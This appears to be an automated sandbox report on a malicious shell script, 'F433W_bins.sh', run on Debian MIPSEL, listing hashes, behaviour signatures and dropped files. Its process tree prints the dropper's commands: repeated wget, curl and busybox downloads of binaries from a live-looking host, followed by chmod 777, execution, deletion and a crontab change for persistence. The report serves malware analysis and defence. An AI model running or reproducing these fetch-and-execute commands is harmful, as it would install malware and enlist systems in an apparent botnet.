Overview

overview

8

Static

static

1

F433W_bins.sh

ubuntu-18.04-amd64

3

F433W_bins.sh

debian-9-armhf

4

F433W_bins.sh

debian-9-mips

8

F433W_bins.sh

debian-9-mipsel

8

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    24-11-2024 06:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    F433W_bins.sh

  • Size

    10KB

  • MD5

    2128d7e395a2eda74b31415f79e2df84

  • SHA1

    eaf344e3ed44c9d46fc9aa91743c11475268dd2b

  • SHA256

    b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84

  • SHA512

    f1a8d87a630d598fce85b893aab3642deed5c779a63c2dc5beab0dfd3a1378e525ad4827d46bb36e8d950fd3fdcd201ba30162865aabba94e1eefe71e68d71a4

  • SSDEEP

    96:YQMyUi6nL7XUL/TsL40hHbWbSq0+B5NWGAf3IL40/1VQ40dd4/4T41G+x1z1zL1n:tYsMkzAc1G+7JzRr8Ac1G+zJzRrG

Score
8/10
defense_evasiondiscoveryexecutionpersistenceprivilege_escalatio

Malware Config

Signatures

  • Contacts a large (1568) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 5 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 17 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/F433W_bins.sh
    /tmp/F433W_bins.sh
    1⤵
      PID:708
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:710
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:716
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:732
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:740
        • /bin/chmod
          chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
          • File and Directory Permissions Modification
          PID:741
        • /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          ./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
          • Executes dropped EXE
          PID:742
        • /bin/rm
          rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
            PID:744
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:745
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:746
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:748
          • /bin/chmod
            chmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
            2⤵
            • File and Directory Permissions Modification
            PID:749
          • /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
            ./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
            2⤵
            • Executes dropped EXE
            PID:750
          • /bin/rm
            rm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
            2⤵
              PID:752
            • /usr/bin/wget
              wget http://conn.masjesu.zip/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
              2⤵
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:753
            • /usr/bin/curl
              curl -O http://conn.masjesu.zip/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
              2⤵
              • Reads runtime system information
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:756
            • /bin/busybox
              /bin/busybox wget http://conn.masjesu.zip/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
              2⤵
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:769
            • /bin/chmod
              chmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
              2⤵
              • File and Directory Permissions Modification
              PID:773
            • /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
              ./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
              2⤵
              • Executes dropped EXE
              PID:775
            • /bin/rm
              rm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
              2⤵
                PID:778
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:779
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:794
              • /bin/busybox
                /bin/busybox wget http://conn.masjesu.zip/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:808
              • /bin/chmod
                chmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
                2⤵
                • File and Directory Permissions Modification
                PID:811
              • /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
                ./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
                2⤵
                • Executes dropped EXE
                • Renames itself
                • Reads runtime system information
                PID:812
                • /bin/sh
                  sh -c "crontab -l"
                  3⤵
                    PID:814
                    • /usr/bin/crontab
                      crontab -l
                      4⤵
                      • Reads runtime system information
                      PID:816
                  • /bin/sh
                    sh -c "crontab -"
                    3⤵
                      PID:819
                      • /usr/bin/crontab
                        crontab -
                        4⤵
                        • Creates/modifies Cron job
                        • Reads runtime system information
                        PID:820
                  • /bin/rm
                    rm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
                    2⤵
                      PID:823
                    • /usr/bin/wget
                      wget http://conn.masjesu.zip/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF
                      2⤵
                      • System Network Configuration Discovery
                      PID:826
                    • /usr/bin/curl
                      curl -O http://conn.masjesu.zip/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF
                      2⤵
                      • System Network Configuration Discovery
                      PID:911
                    • /bin/busybox
                      /bin/busybox wget http://conn.masjesu.zip/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF
                      2⤵
                      • System Network Configuration Discovery
                      • Writes file to tmp directory
                      PID:913
                    • /bin/chmod
                      chmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF
                      2⤵
                      • File and Directory Permissions Modification
                      PID:918
                    • /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF
                      ./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF
                      2⤵
                      • Executes dropped EXE
                      PID:919
                    • /bin/rm
                      rm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF
                      2⤵
                        PID:921
                      • /usr/bin/wget
                        wget http://conn.masjesu.zip/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB
                        2⤵
                        • System Network Configuration Discovery
                        PID:922
                      • /usr/bin/curl
                        curl -O http://conn.masjesu.zip/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB
                        2⤵
                        • System Network Configuration Discovery
                        PID:923

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
                      Filesize

                      141KB

                      MD5

                      3ca8decdb1e52c423c521bfff02ac200

                      SHA1

                      8621ecd6807109b8541912ad9e134f6fb49bfd48

                      SHA256

                      dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                      SHA512

                      b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                      Download Submit

                    • /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
                      Filesize

                      107KB

                      MD5

                      eb9c3a0de91fcf16ba17cb24608df68c

                      SHA1

                      09d95a7d70d5e115d103be51edff7c498d272fac

                      SHA256

                      dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

                      SHA512

                      9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

                      Download Submit

                    • /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
                      Filesize

                      151KB

                      MD5

                      6c583043d91c55aa470c08c87058e917

                      SHA1

                      abf65a5b9bba69980278ad09356e53de8bb89439

                      SHA256

                      2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

                      SHA512

                      82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

                      Download Submit

                    • /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
                      Filesize

                      177KB

                      MD5

                      786d75a158fe731feca3880f436082c0

                      SHA1

                      79ea2734e43d00cdeabed5586b2c1994d02aef3e

                      SHA256

                      5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                      SHA512

                      7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                      Download Submit

                    • /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF
                      Filesize

                      111KB

                      MD5

                      ca897a38f23ec23521ce0b1b83f8422d

                      SHA1

                      b8d2ab335346aba9a72bae0fe3533aca1ab7b66a

                      SHA256

                      043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832

                      SHA512

                      10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb

                      Download Submit

                    • /var/spool/cron/crontabs/tmp.pU1Knh
                      Filesize

                      210B

                      MD5

                      2d0f9fc6b7d701c60c718db6ac79b19a

                      SHA1

                      86b348bf76c6a90fec87524c792c2eeeaf6507ee

                      SHA256

                      6f769b7a665d9be6a0f2776d47abf9e49d8c40f9490d88d9ef88a609b5b18ba5

                      SHA512

                      a553c9f56ea097976f00ad86f86a8f71aa4f14c0c8da4609bd55af9afcebdf42140db5d492c42dab8adcb77563f5a7d5aa7f759fbd2a8866d2de928c433b74d4

                      Download Submit